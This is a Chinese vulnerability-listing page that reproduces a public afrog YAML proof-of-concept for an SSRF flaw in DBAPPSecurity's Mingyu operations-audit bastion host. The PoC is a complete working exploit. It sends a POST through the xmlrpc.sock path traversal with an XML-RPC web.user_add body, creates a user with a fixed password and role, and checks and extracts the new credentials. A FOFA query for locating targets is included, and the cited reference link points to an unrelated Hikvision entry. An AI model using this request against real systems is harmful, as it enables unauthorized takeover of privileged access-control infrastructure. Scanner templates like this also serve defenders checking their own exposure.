dbappsecurity-mingyu-xmlrpc-sock-adduser: 安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞

日期: 2025-09-01 | 影响软件: 安恒 明御运维审计与风险控制系统 | POC: 已公开

漏洞描述

安恒 明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞,通过漏洞可以添加任意用户控制堡垒机 FOFA: "明御运维审计与风险控制系统"

PoC代码[已公开]

id: dbappsecurity-mingyu-xmlrpc-sock-adduser

info:
  name: 安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    安恒 明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞,通过漏洞可以添加任意用户控制堡垒机
    FOFA: "明御运维审计与风险控制系统"
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20综合安防管理平台%20env%20信息泄漏漏洞.html
  tags: dbappsecurity,adduser
  created: 2023/08/10

set:
  uname: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{uname}}/wsrpc
      body: |
        <?xml version="1.0"?>  
        <methodCall>
        <methodName>web.user_add</methodName>
        <params>
        <param>
        <value>
        <array>
        <data>
        <value>
        <string>admin</string>
        </value>
        <value>
        <string>5</string>
        </value>
        <value>
        <string>10.0.0.1</string>
        </value>
        </data>
        </array>
        </value>
        </param>
        <param>
        <value>
        <struct>
        <member>
        <name>uname</name>
        <value>
        <string>{{uname}}</string>
        </value>
        </member>
        <member>
        <name>name</name>
        <value>
        <string>{{uname}}</string>
        </value>
        </member>
        <member>
        <name>pwd</name>
        <value>
        <string>1qaz@3edC12345</string>
        </value>
        </member>
        <member>
        <name>authmode</name>
        <value>
        <string>1</string>
        </value>
        </member>
        <member>
        <name>deptid</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>email</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>mobile</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>comment</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>roleid</name>
        <value>
        <string>102</string>
        </value>
        </member>
        </struct></value>
        </param>
        </params>
        </methodCall>
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'<methodResponse>') && 
      response.body.bcontains(b'<params>') && 
      response.body.bcontains(b'"uname":') &&
      response.body.bcontains(b'"mtime":') &&
      response.body.bcontains(b'"rolename":') &&
      response.body.bcontains(bytes(uname))
    extractors:
      - type: regex
        extractor:
          ext1: '"\"uname\": \"(?P<user>.*?)\"".bsubmatch(response.body)'
          user: ext1["user"]
      - type: word
        extractor:
          pass: "1qaz@3edC12345"
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml

相关漏洞推荐